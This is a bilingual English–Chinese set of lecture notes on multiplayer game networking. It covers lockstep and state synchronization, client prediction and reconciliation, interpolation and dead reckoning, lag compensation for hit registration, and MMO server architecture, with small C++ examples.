    • A rendering freeze does not affect the operation of logical frames

      渲染冻结不影响逻辑帧的运行

    • Servers can run logic frames to solve some cheating problems

      服务器可以运行逻辑框架来解决一些作弊问题

    • If the server runs logical frames, it can save key frame snapshots to speed up reconnection

      如果服务器运行逻辑帧,它可以保存关键帧快照以加快重新连接

    Reconnection Problem

    重新连接问题

    • Offline

      离线

    • Reconnect

      重新连接

    • Catch up

      赶上

    webp

    Client Game State Snapshots

    客户端游戏状态快照

    • Snapshots can be saved regularly on the local client and serialized to disk

      快照可以定期保存在本地客户端上并序列化到磁盘

    • When reconnection occurs, restore the game state from the disk-serialized data

      重新连接时,从磁盘序列化数据还原游戏状态

    • Server sends player commands after snapshot

      服务器在快照后发送玩家命令

    • Accelerate to catch up with the game progress

      加速以赶上游戏进度

    webp

    Quick Catch Up

    快速赶上

    How to catch up?

    如何迎头赶上?

    • In the sample code below, catching up 10 frames at a time

      在下面的示例代码中,每次追赶 10 帧

    • If originally 10 frames per second, when catching up it may run 100 frames per second

      如果原本每秒 10 帧,追帧时可能以每秒 100 帧运行

    float m_delta = 0;
    float m_tick_delta = 100;

    void CBattleLayer::update(float delta) {
        // do something
        m_delta += delta;
        int exec_count = 1;
        while (m_delta >= m_tick_delta) {
            m_delta -= m_tick_delta;
            // logic frame
            if (!logicUpdate(LOGIC_TIME)) {
                return;
            }
            // catch up 10 frames at a time
            if (exec_count++ >= 10) {
                break;
            }
        }
        // do something
    }

    Server State Snapshot Optimization

    服务器状态快照优化

    • The server runs logical frames and saves snapshots of keyframes

      服务器运行逻辑帧并保存关键帧的快照

    • The server sends the snapshot, plus the player commands issued after the snapshot

      服务器发送快照,以及快照之后的玩家命令

    • Accelerate to catch up with the game progress

      加速以赶上游戏进度

    webp

    Temporary Offline, No Crash

    暂时离线,无崩溃

    • Client also keeps game state, keyframes, deterministic-timed frames

      客户端还保留游戏状态、关键帧、确定性定时帧

    • After reconnecting, the server sends commands to the dropped player

      重新连接后,服务器向掉线的玩家发送命令

    • Accelerate to catch up the game progress

      加速以赶上游戏进度

    webp

    Observing

    观察

    Watching other players playing the game

    观看其他玩家玩游戏

    • Reconnecting and watching are essentially the same

      重新连接和观看基本上是一样的

    • Watching is similar to reconnecting after a client crash

      观战类似于客户端崩溃后的重新连接

    • Player action command, forwarded to the player watching the game

      玩家动作命令,转发给观看游戏的玩家

    • Watching is usually delayed for a few minutes to prevent screen peeping

      观看通常会延迟几分钟,以防止偷看屏幕

    webp

    Replay

    重播

    Execute player commands in order, which can be sped up

    按顺序执行玩家命令,并且可以加速执行

    • Replay file

      回放文件

      • Save game commands for a game

        保存一局游戏的命令

      • Files take up little space

        文件占用的空间很小

    • How to implement go back?

      如何实施回退?

      • When the client executes the replay file, it adds a key frame snapshot, which can go back to the key frame moment

        当客户端执行回放文件时,它会添加一个关键帧快照,该快照可以返回到关键帧时刻

      • The current version of Honor of Kings can go back to a key frame up to 60 s earlier

        当前版本的《王者荣耀》可以回退到 60 秒内的关键帧

    webp

    Lockstep Cheating Issues

    锁步作弊问题

    Multiplayer-PVP

    多人 PVP

    • Game over

      游戏结束

      • The client uploads the key data checksum, and the server verifies the game result

        客户端上传关键数据校验和,服务器验证游戏结果

    • During the game

      在游戏过程中

      • Report the key data checksum

        上报关键数据校验和

      • Cheating players are kicked out, etc.

        作弊的玩家被踢出等等。

    webp

    2 Players

    2 名玩家

    • Server cannot detect who is cheating using the key data checksum

      服务器无法使用关键数据校验和检测谁在作弊

    • If the server does not verify, the cheating player will only affect one other player in this case

      如果服务器不进行验证,作弊玩家在这种情况下也只会影响一名玩家

    webp

    • Difficult to prevent third-party plug-ins from accessing fog-of-war or other hidden data

      难以避免第三方插件访问战争迷雾或其他隐藏数据

      • Game logic is performed on the client side

        游戏逻辑在客户端执行

      • Clients have all the game data

        客户端拥有所有游戏数据

    webp

    Lockstep Summary

    锁步总结

    Advantages

    优势

    • Low bandwidth, only sends commands

      带宽低,只发送命令

    • High development efficiency, similar to single-player game development

      开发效率高,类似单人游戏开发

    • Precise action/hit detection

      精确的动作/命中检测

    • Easy to record games

      易于录制游戏

    Problems

    问题

    • Maintaining consistency is difficult to achieve

      保持一致性很难实现

    • Hard to stop cheat plugins from unveiling all game states

      难以防止作弊插件窥探所有游戏状态

    • Longer disconnection and reconnection time

      更长的断开和重新连接时间

      • Need more complex optimization

        需要更复杂的优化

    State Synchronization

    状态同步

    webp

    Replication Protocol of Halo

    Halo 的同步协议

    webp

    State Data 状态数据

    • Guaranteed eventual delivery of the most current state 保证最终交付最新状态
    • Object position 对象位置
    • Object health 对象生命值
    • 150+ properties 150+ 个属性

    Events 事件

    • Unreliable notifications of transient occurrences 不可靠的瞬态事件通知
    • “Please fire my weapon” 请发射我的武器
    • “This weapon was fired” 此武器已被发射
    • “Projectile detonated” 弹丸被引爆
    • More events 更多事件

    Control Data 控制数据

    • High-frequency, best-effort transmission of rapidly-updated data extracted from player control inputs 高频、尽力而为地传输从玩家控制输入中提取的快速更新数据
    • Current analog stick values for all players 所有玩家当前的摇杆值
    • Current position of the client’s own biped 客户端自己角色的当前位置
    • More properties 更多属性

    State

    状态

    • The game state is necessary to represent the game world. e.g: HP, MP

      游戏状态是代表游戏世界所必需的。例如:血量、法力

    State Synchronization

    状态同步

    • Server does not generate a single update for all clients. It sends each client a customized data packet

      服务器不会为所有客户端生成同一份更新,而是向每个客户端发送自定义数据包

    • If the game world is too complex, you can set an Area of Interest (AOI) to reduce server overhead

      如果游戏世界太复杂,可以设置兴趣区域(AOI)来减少服务器开销

    Server Authorizes the Game World

    服务器是游戏世界的权威

    Server

    服务器

    • The game world is authoritative

      游戏世界具有权威性

    • Receive input and state from client

      从客户端接收输入和状态

    • Run game logic

      运行游戏逻辑

    • Send state

      发送状态

    Client

    客户端

    • Receive data and simulate game world

      接收数据并模拟游戏世界

    • Game play improvement

      游戏玩法改进

    webp

    Authorized and Replicated Clients

    授权和同步客户端

    Authorized (1P)

    授权(1P)

    • Player’s local game client

      玩家的本地游戏客户端

    Server

    服务器

    • Authorized server

      授权服务器

    Replicated (3P)

    已同步(3P)

    • Simulated character in other player’s client

      其他玩家客户端中的模拟角色

    webp

    State Synchronization Example

    状态同步示例

    Player1 (Authorized)

    玩家 1(授权)

    • Fire

      开火

    Player2 (Replicated)

    Player2(已同步)

    • See player1 open fire

      看到玩家 1 开火


    Player 1 presses an input on their local machine to fire

    玩家 1 按下本地机器上的输入进行射击

    Player1 (Authorized)

    玩家 1(授权)

    • Fire

      开火

    • Send to server

      发送到服务器

    Server

    服务器

    • Player1 fire

      玩家 1 开火

    • Send to each client

      发送给每个客户端

    Player2 (Replicated)

    玩家 2(已同步)

    • Receive packet

      接收数据包

    • Player1 fire

      Player 1 开火


    Server

    服务器

    Tell each client to replicate the movement of Player 1’s projectile.

    告诉每个客户端同步玩家 1 投射物的运动。


    Server

    • Tell each client to destroy their copies of Player 1’s projectile

      告诉每个客户端销毁它们的玩家 1 投射物副本

    • Tell all clients to respond to the damage of the projectile

      告诉所有客户端对投射物造成的伤害做出反应

    Dumb Client Problem

    哑客户端问题

    Clients cannot do anything until they receive a server state update

    在收到服务器状态更新之前,客户端无法执行任何操作

    How to see an immediate response?

    如何看到即时响应?

    • Client-side prediction

      客户端预测

    • Server reconciliation

      服务器校正

    webp

    Client-Side Prediction

    客户端预测

    Authorized client

    授权客户

    • Press “→”

      按“→”

    • Received server message

      收到服务器消息

    • Start movement

      开始移动

    webp

    Overwatch - Client-side Prediction

    守望先锋-客户端预测

    • RTT = 160ms

      RTT = 160 毫秒

    • Half RTT = 80ms

      半 RTT = 80 毫秒

    • Command frame = 16ms

      命令帧 = 16ms

    The client is always ahead of the server by half RTT and one buffered command frame

    客户端始终领先于服务器一半的 RTT 和一个缓冲命令帧

    • Press key and response immediately

      按键并立即响应

    webp

    Server Reconciliation

    服务器校正

    Authorized client: Buffer

    授权客户端:缓冲区

    • Record every state when do the client prediction

      在进行客户端预测时记录每个状态

    • Compare with the past server data when it is received on the client side

      与客户端接收到的过去服务器数据进行比较


    Ring buffer for states

    状态环形缓冲区

    • Stores all of our states from the past several frames on the client

      将过去几帧中的所有状态存储在客户端上

    Process

    流程

    • If the client computed the same result as server, the client will continue on its merry way to simulate the next input

      如果客户端计算出的结果与服务器相同,客户端将继续愉快地模拟下一个输入

    Problem

    问题

    • If misprediction?

      如果预测失误?

    webp


    • If blocked by an obstacle at the server

      如果被服务器上的障碍物阻挡

    • Position is wrong! (in red)

      位置不对!(红色)

    • Client must accept the new server update

      客户端必须接受新的服务器更新

    • Retrace all predicted movement starting from the new confirmed position

      从新的确认位置开始回溯所有预测的运动

    webp


    • If the client and server disagree on the results, we’ve mispredicted

      如果客户端和服务器对结果不一致,我们就预测错了

    • Have to reconcile

      必须和解

    Ring buffer for inputs

    用于输入的环形缓冲区

    • Stores all of the inputs we made in the past several frames on the client.

      在客户端上存储我们在过去几帧中所做的所有输入。

    Process

    流程

    • Overwrite the client’s results with the server’s results

      用服务器的结果覆盖客户端的结果

    • Replay all of your inputs to catch back up to what you believe now

      重放您的所有输入,追回到您现在认为正确的状态
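    A minimal C++ sketch of this reconciliation (simulate stands in for the game's deterministic step; all names are illustrative):

    struct Input { float move; };
    struct State { int frame; float x; };

    const int N = 64;          // ring buffers for the last N frames
    State stateBuf[N];
    Input inputBuf[N];

    // Deterministic step: same input + same state => same result everywhere.
    State simulate(const State& s, const Input& in) {
        return { s.frame + 1, s.x + in.move };
    }

    // Called when an authoritative server state arrives.
    void reconcile(const State& serverState, int currentFrame) {
        State& predicted = stateBuf[serverState.frame % N];
        if (predicted.x == serverState.x) return;  // prediction was correct

        // Misprediction: accept the server result, then replay buffered
        // inputs from that frame up to now to catch back up.
        State s = serverState;
        for (int f = serverState.frame; f < currentFrame; ++f) {
            s = simulate(s, inputBuf[f % N]);
            stateBuf[s.frame % N] = s;
        }
    }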

    webp

    Server Reconciliation Example

    服务器校正示例

    Overwatch

    守望先锋

    • We try to move

      我们试图移动

    • The server said no

      服务器拒绝了

    • We got yanked back down to where we were before and froze

      我们被拉回到原来的位置,然后僵住了

    webp

    Packet Loss

    数据包丢失

    • Client input packages fail to reach the server

      客户端输入包无法到达服务器

    • The server tries to keep tiny input buffer of unprocessed input

      服务器试图保留未处理输入的微小输入缓冲区

    • If the server runs out of input buffer, the server will duplicate your last input within a window

      如果服务器的输入缓冲区用完,服务器将在一个窗口内复制您的最后一个输入

    • Push the client to send missed inputs ASAP

      推动客户端尽快发送丢失的输入

    webp

    State Synchronization vs. Lockstep Synchronization

    状态同步与锁步同步

    • Deterministic logic 确定性逻辑: State Sync not necessary 不需要; Lockstep necessary 必要
    • Responsiveness 响应: State Sync better 更好; Lockstep poor 较差
    • Network traffic 网络流量: State Sync usually high 通常较高; Lockstep usually low 通常较低
    • Development efficiency 开发效率: State Sync much more complicated 复杂得多; Lockstep easy to develop, difficult to debug 易于开发,难以调试
    • Number of players 玩家数量: State Sync supports small and large numbers of players 支持少量和大量玩家; Lockstep few players 少量玩家
    • Cross-platform 跨平台: State Sync relatively easy 相对容易; Lockstep relatively difficult 相对困难
    • Reconnect 重连: State Sync relatively easy 相对容易; Lockstep relatively difficult 相对困难
    • Replay file size 回放文件大小: State Sync big 大; Lockstep small 小
    • Cheating 作弊: State Sync relatively hard 相对困难; Lockstep relatively easy 相对容易

    References

    Network Protocols

    Network Synchronization

    第十九节:网络游戏的进阶架构

    Online Gaming Architecture - Advanced Topics

    Character Movement Replication

    角色动作同步

    Character Movement Replication

    角色动作同步

    From player 2’s point of view, player 1’s movement is very choppy and lags behind player 1’s actual position.

    从玩家 2 的角度来看,玩家 1 的动作非常不稳定,落后于玩家 1 的实际位置。

    Interpolation & Extrapolation

    内插值和外插值

    Purpose: Smooth movement of players’ characters on screen

    目的:玩家角色在屏幕上流畅移动

    Interpolation

    内插值

    • Calculate the state between old but known states

      计算旧但已知状态之间的状态

    webp

    Extrapolation

    外插值

    • Predict where entity is going from old states

      预测实体从旧状态走向何方

    webp

    Smooth States by Interpolations

    插值平滑状态

    • Position and orientation can be interpolated between two recently received data packets

      位置和方向可以在最近接收到的两个数据之间进行插值

    Buffer States and Deferred Render

    缓冲区状态和延迟渲染

    • Data packet will not be rendered immediately when received

      数据包在收到后不会立即呈现

    • Put into memory and wait for a new data packet

      放入内存并等待新的数据包

    • After waiting for a time offset, start to render first received data packet

      等待时间偏移后,开始渲染第一个接收到的数据包

    • Create an artificial delay of interpolation offset

      创建插值偏移的人工延迟

    webp

    Character Movement Replication by Interpolation

    通过插值同步角色动作

    Result after interpolation was implemented

    插值后的结果

    Interpolation Challenges of Vehicle Movement Replication

    车辆运动同步的插值挑战

    webp

    Estimate Current State by Extrapolation

    通过外推法估计当前状态

    • Use past states to estimate the current state to compensate for network lag

      使用过去的状态来估计当前状态,以补偿网络延迟

    Dead Reckoning

    航位推算(Dead Reckoning)

    • Estimate future state based on states that have been received

      根据已收到的状态估计未来状态

    webp

    Projective Velocity Blending

    投影速度混合

    • At $t_0$, the replicated character is at $p_0$ with velocity $v_0$ and acceleration $a_0$, and receives the synced state with position $p’_0$, velocity $v’_0$, acceleration $a’_0$

      在时间 $t_0$,被同步的角色位于 $p_0$,速度为 $v_0$,加速度为 $a_0$,并接收到同步状态:位置 $p’_0$、速度 $v’_0$、加速度 $a’_0$。

    • We can predict position $p’_t$ after a time duration $t$ based the synced states

      我们可以根据同步的状态预测在时间持续 $t$ 后的位置 $p’_t$。

    $$p’_t=p’_0+v’_0t+\frac{1}{2}a’_0t^2$$

    • Our goal is to reach $p’_t|_{t=t_B}$ smoothly after a fixed blending time duration: $t_B-t_0$

      我们的目标是在固定的混合时长 $t_B - t_0$ 后平滑地到达 $p’_t|_{t=t_B}$。

    webp

    At any time $t$, we can get the blending velocity $v_t$

    在任何时刻 $t$,我们可以得到混合速度 $v_t$

    $$\lambda=\frac{t-t_0}{t_B-t_0}$$

    $$v_t=v_0+\lambda(v’_0-v_0)$$

    And projecting the position $p_t$ from $p_0$

    并从 $p_0$ 投影位置 $p_t$

    $$p_t=p_0+v_tt+\frac{1}{2}a’_0t^2$$

    Then get the dead reckoned position $p_d$ by combining $p_t$ and $p’_t$

    然后通过结合 $p_t$ 和 $p’_t$ 得到估算位置 $p_d$

    $$p_d=p_t+\lambda(p’_t-p_t)$$
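    A one-axis C++ sketch of these formulas (clamping λ to 1 after the blend window; names are illustrative):

    struct Kinematic { float p, v, a; };  // position, velocity, acceleration

    // local:  p0, v0, a0 at time t0;  synced:  p'0, v'0, a'0 received at t0
    // t: time since t0;  tBlend: blend duration tB - t0
    float projectiveVelocityBlend(const Kinematic& local, const Kinematic& synced,
                                  float t, float tBlend) {
        float lambda = t < tBlend ? t / tBlend : 1.0f;   // λ = (t - t0) / (tB - t0)
        float vt  = local.v + lambda * (synced.v - local.v);
        float pt  = local.p  + vt * t        + 0.5f * synced.a * t * t;  // projected p_t
        float ppt = synced.p + synced.v * t  + 0.5f * synced.a * t * t;  // predicted p't
        return pt + lambda * (ppt - pt);                 // dead-reckoned p_d
    }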

    webp

    Collision Issues

    碰撞问题

    The dead-reckoned collision trajectory looks weird

    航位推算的碰撞轨迹看起来很奇怪

    Phase 1: Collision starts

    **第一阶段:**碰撞开始

    Phase 2: The replica keeps going, since the extrapolation is based on the last snapshot

    **第二阶段:**副本继续前进,因为外推是基于最后一次快照

    Phase 3: Finally we receive a snapshot to stop the replica, but the replica gives the master’s rigidbody a huge velocity, pushing the master away

    **第三阶段:**最后我们收到一个快照来停止副本,但副本会给主控端的刚体一个巨大的速度,将其推开

    Physics Simulation Blending During Collision

    碰撞过程中的物理模拟混合

    Tunable between two states

    可在两个状态之间调整

    • State calculated by the client physics simulation

      客户端物理模拟计算的状态

    • State that tries to reach the dead-reckoned position

      试图到达航位推算位置的状态

    webp

    Tuned blending factors from Watch Dogs 2, Ubisoft Toronto. Bikes recover faster than cars

    调整了育碧多伦多《看门狗 2》的混合因子。自行车的恢复速度比汽车快。

    Usage Scenario of Interpolation

    插值使用场景

    Scenario for Using Interpolation

    使用插值的场景

    • Characters’ movements are very non-deterministic, with high acceleration

      角色的运动非常不确定,加速度高

    • Gameplay suffers from the “warp” when extrapolation errors occur

      当出现外推错误时,游戏会受到“瞬移”的影响

    Typical examples

    典型示例

    • FPS
    • MOBA

    webp

    Usage Scenario of Extrapolation

    外推法使用场景

    Scenario for Using Extrapolation

    使用外推法的场景

    • Player movement uses a realistic physical model

      玩家动作使用逼真的物理模型

    • Gameplay suffers from latency due to network transmission

      游戏因网络传输而延迟

    Typical examples

    典型示例

    • Racing game. Vehicle systems (Tanks, Ships, etc.)

      赛车游戏。载具系统(坦克、船舶等)

    webp

    Blend Scenario of Interpolation and Extrapolation

    插值和外推的混合场景

    Sometimes we need to apply both interpolation and extrapolation for the game to work properly

    有时我们需要同时应用插值和外推法才能使游戏正常工作

    • Apply Extrapolation on vehicles

      对车辆应用外推法

    • Apply Interpolation for characters

      对角色应用插值

    • Do extrapolation if not enough data received

      如果没有收到足够的数据,则进行外推

    webp

    Hit Registration

    命中注册

    How to Make a Headshot in Online Game

    如何在网络游戏中打出爆头

    Net messages take time to travel from client to server, and interpolation causes you to see the enemy lagging behind

    网络消息从客户端传输到服务器需要时间,插值会导致你看到的敌人位置滞后

    webp

    Where is the Enemy?

    敌人在哪里?

    Due to latency, interpolation offset and time delay, you’ll see other players slightly behind their current server positions. Where should I shoot?

    由于延迟、插值偏移和时间延迟,你会看到其他玩家稍微落后于他们当前的服务器位置。我应该朝哪里开枪?

    Where Should I Shoot?

    我应该朝哪里开枪?

    webp

    Hit Registration

    命中注册

    Hit registration is making a consensus among all players on whether you’ve actually hit your enemy

    命中注册是让所有玩家就你是否真的击中了敌人达成共识。

    webp

    • Detecting hit event on client-side with replicated character positions

      通过同步角色位置在客户端检测命中事件

    • Send hit events to the server

      将命中事件发送到服务器

    • Server runs a simple verification

      服务器运行简单验证

    webp

    A Comparison of Hitscan Weapons versus Projectile Weapons

    Hitscan 武器与投射武器的比较

    Unlike hitscan weapons, projectile weapons can also simulate the effect of gravity

    与 hitscan 武器不同,投射武器还可以模拟重力的影响

    webp

    The scenery in Battlefield is built from several hitboxes, so destruction can take away walls, floors, etc.

    《战地》中的场景是由几个 hitbox 构建的,因此破坏可以带走墙壁、地板等。

    webp

    • Hitscan: the shot hits the target immediately after firing

      Hitscan 发射射弹后立即击中目标

    • Projectile: the shot takes some time to hit the target after firing

      Projectile 发射射弹后需要一定时间才可击中目标

    A Very Simple Server Verification of Hit Event

    一种非常简单的服务器命中事件验证

    • Client send hit event with complete ray information to server

      客户端向服务器发送包含完整射线信息的命中事件

      • StartPoint, HitPoint and HitObject of the Raycast

        光线投射的起点(StartPoint)、命中点(HitPoint)和命中对象(HitObject)

    • Validate whether the StartPoint is really close enough to the shooter

      验证起点是否真的足够接近射击者

    • Validate whether the HitPoint really belongs to the HitObject

      验证命中点是否真的属于命中对象

    • Ensure nothing is blocking along the path by casting a ray from the StartPoint to the HitPoint

      通过从起点向命中点投射光线,确保路径上没有任何遮挡

    In a real game, the server verification is VERY TRICKY AND COMPLICATED

    在真实游戏中,服务器验证非常棘手和复杂
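    A minimal C++ sketch of the simple verification above (rayBlocked and pointOnObject stand in for the server's physics queries; the 1-meter tolerance is an arbitrary assumption):

    #include <cmath>

    struct Vec3 { float x, y, z; };

    float dist(const Vec3& a, const Vec3& b) {
        float dx = a.x - b.x, dy = a.y - b.y, dz = a.z - b.z;
        return std::sqrt(dx * dx + dy * dy + dz * dz);
    }

    bool rayBlocked(const Vec3& from, const Vec3& to);   // assumed physics query
    bool pointOnObject(int hitObjectId, const Vec3& p);  // assumed hitbox test

    bool verifyHit(const Vec3& shooterPos, const Vec3& startPoint,
                   const Vec3& hitPoint, int hitObjectId) {
        if (dist(shooterPos, startPoint) > 1.0f) return false;   // start point too far from shooter
        if (!pointOnObject(hitObjectId, hitPoint)) return false; // hit point not on the claimed object
        if (rayBlocked(startPoint, hitPoint)) return false;      // something blocks the path
        return true;
    }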

    Server Verification Has to Guess

    服务器验证必须猜测

    webp

    Problem of Client-Side Hit Detection

    客户端命中检测问题

    Efficient and Precise

    高效精准

    • Very efficient for hit detection without huge server workload

      非常有效的命中检测,无需巨大的服务器工作负载

    • Best shooting experience with pixel precision

      像素级精度的最佳射击体验

    Unsafe for cheating

    易于玩家作弊

    • Fake hit event message

      伪造的命中事件消息

    • Lag switches

      滞后开关

    • Infinite ammo

      无限弹药

    Detecting Hit on Server-Side?

    检测服务器端的命中?

    Client doesn’t know the target current location on server

    客户端不知道服务器上的目标当前位置

    webp

    Lag Compensation

    滞后补偿

    Server-side state rewinding to compensate network lags when player’s commands are executed

    服务器端状态倒带,以补偿执行玩家命令时的网络延迟

    • Get information from clients

      从客户那里获取信息

    • Rewind the game state using cached state snapshots matching the client’s action time

      使用与客户端操作时间匹配的缓存状态快照回溯游戏状态

    • Run the client operation in the rewound game state

      在回溯的游戏状态下运行客户端操作

    webp

    Compensate all Possible Lags

    补偿所有可能的延迟

    • RewindTime = Current Server Time - Packet Latency - Client View Interpolation Offset

      RewindTime = 当前服务器时间 - 数据包延迟 - 客户端视图插值偏移
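    A minimal C++ sketch of picking the rewound snapshot (WorldSnapshot and history are illustrative assumptions):

    #include <cmath>
    #include <deque>

    struct WorldSnapshot { double time; /* cached hitbox positions, ... */ };

    std::deque<WorldSnapshot> history;  // state snapshots cached by the server

    // RewindTime = current server time - packet latency - interpolation offset
    const WorldSnapshot* rewind(double serverTime, double latency, double interpOffset) {
        double rewindTime = serverTime - latency - interpOffset;
        const WorldSnapshot* best = nullptr;
        for (const WorldSnapshot& s : history)  // pick the closest cached snapshot
            if (!best || std::abs(s.time - rewindTime) < std::abs(best->time - rewindTime))
                best = &s;
        return best;  // run the client's shot against this rewound state
    }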

    webp

    webp

    Actor: Enemy’s client state

    角色:敌人的客户端状态

    Red collision box: Enemy in the player’s view

    红色碰撞框:玩家视野中的敌人

    Blue collision box: Rewinded server state

    蓝色冲突框:倒带服务器状态

    Cover Problems – Running into Cover

    掩体问题——遇到掩体

    webp

    The victim who has taken cover is still hit due to network latency: shooter’s advantage.

    被击中者躲到掩体后因为网络延迟仍被击中,shooter’s advantage(射击者优势)。

    Cover Problems – Coming out from Cover

    webp

    The victim coming out from cover is not hit due to network latency: peeker’s advantage.

    被攻击者从掩体出来因网络延迟未被击中,peeker’s advantage(窥视者优势)。

    Startup Frames to Ease Latency Feeling

    用启动帧缓解延迟感

    • A fixed animation before attack or move can also eliminate the effect of lag from network transmission

      攻击或移动前的固定动画(技能前摇)也可以消除网络传输延迟的影响

    • Players will keep their attention on animations and ignore the state delay

      玩家将注意力集中在动画上,忽略状态延迟

    webp

    Local Forecast VFX Impacts

    本地预测 VFX 影响

    • Clients can perform local hit tests in order to give the player some instant feedback, such as displaying a blood splatter visual effect

      客户端可以执行本地命中测试,以便为玩家提供一些即时反馈,例如显示血溅的视觉效果

    • However, any permanent effects of the hits, such as reducing the hit points of a player, are only applied after receiving confirmation from the server

      但是,只有在收到服务器的确认后,才会应用命中的任何永久效果,例如减少玩家的命中点

    MMOG Network Architecture

    MMOG 网络架构

    What is MMOG?

    什么是 MMOG?

    MMOG: Massively Multiplayer Online Game, or more commonly MMO

    MMOG:大型多人在线游戏,或更常见的 MMO

    MMOs with a large number of players, often hundreds or thousands, on the same server can enable players to cooperate and compete with each other on a large scale, and include a variety of gameplay types (MMORPG, MMORTS, MMOFPS, etc.)

    在同一台服务器上拥有大量玩家(通常是数百或数千人)的 MMO 可以使玩家能够大规模地相互合作和竞争,并包括各种游戏类型(MMORPG、MMORTS、MMOFPS 等)

    webp

    webp

    Diversities of Modern MMO

    现代 MMO 的多样性

    webp

    Game Sub-Systems

    游戏子系统

    MMOs have a variety of gameplay and are supported by many sub-systems

    MMO 具有多种游戏玩法,并得到许多子系统的支持

    • User management

      用户管理

    • Matchmaking

      配对

    • Trading system

      交易系统

    • Social system

      社交系统

    • Data storage

      数据存储

    MMO Architecture

    MMO 架构

    webp

    Link Layer Services

    链路层服务

    Login Server

    登录服务器

    • Verification of client connection

      客户端连接验证

    Gateway

    网关

    • Very important layer to separate inside/outside networks

      分隔内部/外部网络的非常重要的层

    webp

    Lobby

    大厅

    • Players can gather in the lobby, see and interact with other players

      玩家可以聚集在大厅,观看并与其他玩家互动

    • When the number of players continues to increase, it is a challenge to the performance of the server and the client

      当玩家数量持续增加时,服务器和客户端的性能都会受到挑战

    webp

    Character Server

    角色服务器

    All player data is managed in one system. Such as account info, character info, backpack info, mail info, etc.

    所有玩家数据都在一个系统中管理。如账户信息、人物信息、背包信息、邮件信息等。

    webp

    Trading System

    交易系统

    • Buying and selling items on the marketplace

      在市场上买卖商品

    • Sending items or coins to other players through the in-game Mail

      通过游戏内邮件向其他玩家发送物品或硬币

    • Game designers need to keep an eye on market prices to prevent imbalances

      游戏设计师需要关注市场价格,以防止不平衡

    • For a persistent world to maintain a stable economy, a balance must be struck between currency sources and sinks

      为了让持久世界保持稳定的经济,必须在货币的产出和消耗之间取得平衡

    • Players can use real-world money to buy a specific in-game item

      玩家可以用现实世界的钱购买特定的游戏内物品

    webp

    Social System

    社交系统

    • Player-to-player interplay and communication

      玩家之间的互动和沟通

    • Foster stronger social cohesion in-game

      在游戏中培养更强的社会凝聚力

    webp

    Matchmaking

    配对

    • You have to consider attributes like skills, level, latency, wait time…

      你必须考虑技能、级别、延迟、等待时间等属性…

    • In general, making a good matchmaking service is core to a game’s design

      一般来说,做好配对服务是游戏设计的核心

    • Running this on a global scale for your player population presents a whole different set of challenges

      在全球范围内为您的玩家群体运行此功能会带来一系列完全不同的挑战

    webp

    Data Storage

    数据存储

    The game data is very complex and diverse

    游戏数据非常复杂和多样化

    • Player data (guilds, dungeons, warehouse, etc.)

      玩家数据(公会、地下城、仓库等)

    • Monitoring data

      监测数据

    • Mining data

      挖掘数据

    Data needs to be securely persisted and efficiently organized for retrieved and analysis etc.

    数据需要安全地持久化,并有效地组织起来进行检索和分析等。

    webp

    Relational Data Storage: MySQL

    关系数据存储:MySQL

    • Requires Structure to be Predetermined

      需要预先确定结构

    • Flexible Queries

      灵活的查询

    • Always Consistent

      始终保持一致

    Game Development Examples

    游戏开发示例

    • Player Data

      玩家数据

    • Game Data

      游戏数据

    • Inventory

      库存

    • Item Shops/Trading

      商品商店/交易

    Non-Relational Data Storage: MongoDB

    非关系数据存储:MongoDB

    • Structure Can Change For Each Entry

      每个条目的结构都可能发生变化

    • Queries Have Higher Specificity

      查询具有更高的特异性

    • May Not Always Be Consistent

      可能并不总是一致的

    Game Development Examples

    游戏开发示例

    • Player/Item Stats/Profile Game Data

      玩家/物品统计/个人资料游戏数据

    • Enchantments and Upgrades

      魔法和升级

    • Game States

      游戏状态

    • Quest Data

      任务数据

    In-Memory Data Storage: Redis

    内存数据存储:Redis

    • Extremely Fast (Memory versus Hard Disk)

      极快(内存与硬盘)

    • Key-Value

      键值(Key-Value)

    • Fast Sorted/Ranged Searches

      快速排序/范围搜索

    • Persistence among servers

      服务器间的持久性

    Game Development Examples

    游戏开发示例

    • Matchmaking

      配对

    • Leaderboards

      排行榜

    • Session Management

      会话管理

    • Boost Performance For Other Databases

      提高其他数据库的性能

    Player Number Growth

    玩家数量增长带来的服务器负担

    webp

    Distributed System

    分布式系统

    A distributed system is a computing environment in which various components are spread across multiple computers (or other computing devices) on a network

    分布式系统是一种计算环境,其中各种组件分布在网络上的多台计算机(或其他计算设备)上

    webp

    Challenges with Distributed systems

    分布式系统的挑战

    • Data access mutual exclusion

      数据访问互斥

    • Idempotence

      幂等性

    • Failure and partial failure

      故障和部分故障

    • Unreliable network

      不可靠的网络

    • Distributed bugs spread epidemically

      分布式漏洞以流行病的方式传播

    • Consistency and consensus

      一致性和共识

    • Distributed transaction

      分布式事务

    Load Balancing

    负载平衡

    Refers to the process of distributing a set of tasks over a set of resources (computing units), with the aim of making their overall processing more efficient

    指将一组任务分配到一组资源(计算单元)上的过程,目的是提高其整体处理效率

    • Optimize the response time

      优化响应时间

    • Avoid unevenly overloading some compute nodes while other compute nodes are left idle

      避免在其他计算节点处于空闲状态时,不均匀地使某些计算节点过载

    • All players are evenly divided on multiple servers

      所有玩家平均分布在多个服务器上

    webp

    Consistent Hashing

    一致性哈希

    It was designed to avoid the problem of having to reassign every player when a server is added or removed throughout the cluster

    它旨在避免在整个集群中添加或删除服务器时必须重新分配每个玩家的问题
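    A minimal C++ sketch of a consistent-hash ring (names are illustrative; the virtual nodes discussed below would insert each server several times under salted ids):

    #include <cstdint>
    #include <functional>
    #include <map>
    #include <string>

    struct HashRing {
        std::map<uint64_t, std::string> ring;  // hash position -> server id
        std::hash<std::string> h;

        void addServer(const std::string& id)    { ring[h(id)] = id; }
        void removeServer(const std::string& id) { ring.erase(h(id)); }

        // A player maps to the first server clockwise from its hash, so
        // adding or removing a server only moves the players nearby.
        std::string serverFor(const std::string& playerId) const {
            auto it = ring.lower_bound(h(playerId));
            if (it == ring.end()) it = ring.begin();  // wrap around the ring
            return it->second;
        }
    };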

    webp

    webp

    webp

    Virtual Server Node in Consistent Hashing

    一致性哈希中的虚拟服务器节点

    webp

    Server Management

    服务器管理

    • The number of services increases

      服务数量增加

    • Difficult to manage

      难以管理

    • Lacks the flexibility to change the IP or port at a later point in time

      缺乏在以后更改 IP 或端口的灵活性

    webp

    Service Discovery - Registry

    服务发现-注册表

    • Registers itself with the service registry when it enters the system

      当服务进入系统时,在服务注册表中注册

    • An example of Register value

      寄存器值示例

      • server type/server_name@server_ip:port

    webp

    Service Discovery - Query and Watch

    服务发现-查询和监视

    • Request the service discovery service to query all values by service type, and watch them

